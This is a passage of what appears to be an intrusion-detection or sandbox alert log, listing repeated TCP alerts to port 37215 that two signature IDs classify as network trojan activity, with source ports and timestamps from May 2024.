              SID:2829579
              Source Port:41972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105808
              SID:2835222
              Source Port:50406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113754
              SID:2835222
              Source Port:44646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119381
              SID:2835222
              Source Port:50824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099241
              SID:2829579
              Source Port:59006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576456
              SID:2835222
              Source Port:57772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870293
              SID:2835222
              Source Port:38052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201189
              SID:2835222
              Source Port:55674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860026
              SID:2835222
              Source Port:42040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.109422
              SID:2835222
              Source Port:35258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358471
              SID:2835222
              Source Port:44760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397245
              SID:2835222
              Source Port:42592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.109310
              SID:2835222
              Source Port:45406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764059
              SID:2829579
              Source Port:36350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208294
              SID:2835222
              Source Port:52468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.119813
              SID:2835222
              Source Port:37312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460547
              SID:2829579
              Source Port:39474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516332
              SID:2835222
              Source Port:41958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601446
              SID:2829579
              Source Port:34734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423399
              SID:2835222
              Source Port:57470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481185
              SID:2829579
              Source Port:52130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447213
              SID:2835222
              Source Port:45598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548267
              SID:2829579
              Source Port:36618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639749
              SID:2829579
              Source Port:47596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.265951
              SID:2829579
              Source Port:55942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458424
              SID:2835222
              Source Port:43936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870669
              SID:2829579
              Source Port:39764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116615
              SID:2835222
              Source Port:39028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.707794
              SID:2829579
              Source Port:54028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544054
              SID:2835222
              Source Port:57696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.990933
              SID:2835222
              Source Port:44688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596476
              SID:2835222
              Source Port:55074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926250
              SID:2829579
              Source Port:52764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063398
              SID:2835222
              Source Port:47990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041093
              SID:2835222
              Source Port:54020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210267
              SID:2829579
              Source Port:59264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661152
              SID:2835222
              Source Port:38784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062843
              SID:2829579
              Source Port:33154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.738864
              SID:2835222
              Source Port:59030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801983
              SID:2835222
              Source Port:51448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059656
              SID:2829579
              Source Port:54356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246494
              SID:2829579
              Source Port:45390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.108608
              SID:2829579
              Source Port:37420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724489
              SID:2829579
              Source Port:59960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165100
              SID:2829579
              Source Port:52160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.121443
              SID:2829579
              Source Port:39264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873734
              SID:2835222
              Source Port:40846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.369059
              SID:2835222
              Source Port:50680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.684828
              SID:2829579
              Source Port:34914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750080
              SID:2829579
              Source Port:59736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.822877
              SID:2829579
              Source Port:47866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.860045
              SID:2829579
              Source Port:43882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596640
              SID:2835222
              Source Port:59882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102196
              SID:2835222
              Source Port:44554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372548
              SID:2829579
              Source Port:34074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.871679
              SID:2829579
              Source Port:53248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921301
              SID:2835222
              Source Port:38636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098915
              SID:2835222
              Source Port:40508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482235
              SID:2829579
              Source Port:54492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368584
              SID:2835222
              Source Port:55476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988570
              SID:2829579
              Source Port:45768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371973
              SID:2829579
              Source Port:35082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423383
              SID:2829579
              Source Port:56910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518879
              SID:2829579
              Source Port:57224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118581
              SID:2829579
              Source Port:54132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694579
              SID:2829579
              Source Port:32926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493661
              SID:2835222
              Source Port:32956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763948
              SID:2829579
              Source Port:43188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624798
              SID:2829579
              Source Port:44932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456434
              SID:2835222
              Source Port:59912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570539
              SID:2829579
              Source Port:36850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695252
              SID:2829579
              Source Port:44930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057508
              SID:2835222
              Source Port:55286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334269
              SID:2835222
              Source Port:47708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.248888
              SID:2835222
              Source Port:44018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394456
              SID:2829579
              Source Port:58824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.433207
              SID:2829579
              Source Port:57644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245870
              SID:2835222
              Source Port:59216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802194
              SID:2829579
              Source Port:47032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491493
              SID:2829579
              Source Port:38100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078697
              SID:2829579
              Source Port:35072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572057
              SID:2835222
              Source Port:33648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545510
              SID:2835222
              Source Port:60590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623451
              SID:2835222
              Source Port:59562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640519
              SID:2835222
              Source Port:49842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621750
              SID:2835222
              Source Port:34936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.396525
              SID:2835222
              Source Port:36972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.825676
              SID:2835222
              Source Port:47344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445092
              SID:2829579
              Source Port:42238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149093
              SID:2829579
              Source Port:56928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200566
              SID:2835222
              Source Port:47244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536617
              SID:2835222
              Source Port:37576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397237
              SID:2829579
              Source Port:55270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099943
              SID:2829579
              Source Port:44892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749028
              SID:2835222
              Source Port:35632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538133
              SID:2835222
              Source Port:53388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507560
              SID:2829579
              Source Port:42106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097241
              SID:2829579
              Source Port:46774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625700
              SID:2829579
              Source Port:35512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429713
              SID:2835222
              Source Port:54684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598111
              SID:2829579
              Source Port:39844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727268
              SID:2829579
              Source Port:45586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924227
              SID:2829579
              Source Port:33170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857428
              SID:2835222
              Source Port:47804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623929
              SID:2835222
              Source Port:35776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637765
              SID:2829579
              Source Port:39380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448288
              SID:2829579
              Source Port:58204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.770910
              SID:2829579
              Source Port:38160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.289116
              SID:2829579
              Source Port:41548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693182
              SID:2829579
              Source Port:50986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250872
              SID:2829579
              Source Port:60980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252745
              SID:2835222
              Source Port:53490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.433297
              SID:2829579
              Source Port:59284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624777
              SID:2835222
              Source Port:52210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151228
              SID:2829579
              Source Port:35524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446919
              SID:2829579
              Source Port:60228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.980745
              SID:2829579
              Source Port:54402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.160585
              SID:2835222
              Source Port:60044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400777
              SID:2829579
              Source Port:44918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624097
              SID:2829579
              Source Port:43460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545331
              SID:2835222
              Source Port:42972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429646
              SID:2829579
              Source Port:52700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547866
              SID:2829579
              Source Port:47320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517314
              SID:2835222
              Source Port:32804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585186
              SID:2835222
              Source Port:45046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231827
              SID:2835222
              Source Port:55300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254312
              SID:2829579
              Source Port:48082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.080898
              SID:2829579
              Source Port:41412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622831
              SID:2835222
              Source Port:57392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797325
              SID:2835222
              Source Port:48488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372062
              SID:2829579
              Source Port:49378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480826
              SID:2829579
              Source Port:57744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.467870
              SID:2829579
              Source Port:44960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368797
              SID:2835222
              Source Port:42706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606926
              SID:2835222
              Source Port:54726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166872
              SID:2835222
              Source Port:55794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233868
              SID:2835222
              Source Port:46514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432368
              SID:2829579
              Source Port:40306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.050032
              SID:2835222
              Source Port:60294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801723
              SID:2835222
              Source Port:56458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267098
              SID:2829579
              Source Port:34696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695862
              SID:2829579
              Source Port:52622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764373
              SID:2835222
              Source Port:54358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575585
              SID:2829579
              Source Port:49602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197935
              SID:2829579
              Source Port:54558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279420
              SID:2829579
              Source Port:58994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536457
              SID:2835222
              Source Port:42044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482818
              SID:2835222
              Source Port:40814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623018
              SID:2835222
              Source Port:58352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.096781
              SID:2835222
              Source Port:52162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.345440
              SID:2829579
              Source Port:56492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127539
              SID:2835222
              Source Port:51372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574660
              SID:2829579
              Source Port:55408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.703557
              SID:2835222
              Source Port:47006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102947
              SID:2829579
              Source Port:40680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445812
              SID:2829579
              Source Port:35704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198561
              SID:2829579
              Source Port:48222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372065
              SID:2835222
              Source Port:53714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432214
              SID:2829579
              Source Port:48890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724503
              SID:2829579
              Source Port:39268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065695
              SID:2835222
              Source Port:56004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551230
              SID:2835222
              Source Port:58824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.969388
              SID:2829579
              Source Port:53662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724950
              SID:2829579
              Source Port:45344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231619
              SID:2829579
              Source Port:37384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882731
              SID:2835222
              Source Port:59286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443992
              SID:2835222
              Source Port:50346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.701011
              SID:2835222
              Source Port:54438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.867949
              SID:2829579
              Source Port:48334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872301
              SID:2835222
              Source Port:38084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055582
              SID:2835222
              Source Port:46174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431613
              SID:2835222
              Source Port:36246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859611
              SID:2835222
              Source Port:54112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040976
              SID:2835222
              Source Port:55116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692531
              SID:2829579
              Source Port:34186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408004
              SID:2829579
              Source Port:59346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313719
              SID:2835222
              Source Port:59722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503696
              SID:2835222
              Source Port:42274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062737
              SID:2835222
              Source Port:57540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866475
              SID:2835222
              Source Port:51912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279997
              SID:2829579
              Source Port:46432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872382
              SID:2835222
              Source Port:52432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505505
              SID:2829579
              Source Port:54790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.684840
              SID:2829579
              Source Port:34682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575189
              SID:2835222
              Source Port:36230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.741184
              SID:2835222
              Source Port:48060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.972613
              SID:2835222
              Source Port:53454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099647
              SID:2829579
              Source Port:34444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.432283
              SID:2835222
              Source Port:47942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662642
              SID:2835222
              Source Port:42692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484930
              SID:2835222
              Source Port:56758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535504
              SID:2835222
              Source Port:45884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445247
              SID:2835222
              Source Port:40684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595545
              SID:2829579
              Source Port:33652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764531
              SID:2835222
              Source Port:56730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100742
              SID:2835222
              Source Port:55138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114739
              SID:2835222
              Source Port:35540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.544309
              SID:2829579
              Source Port:53058
              Destination Port:37215
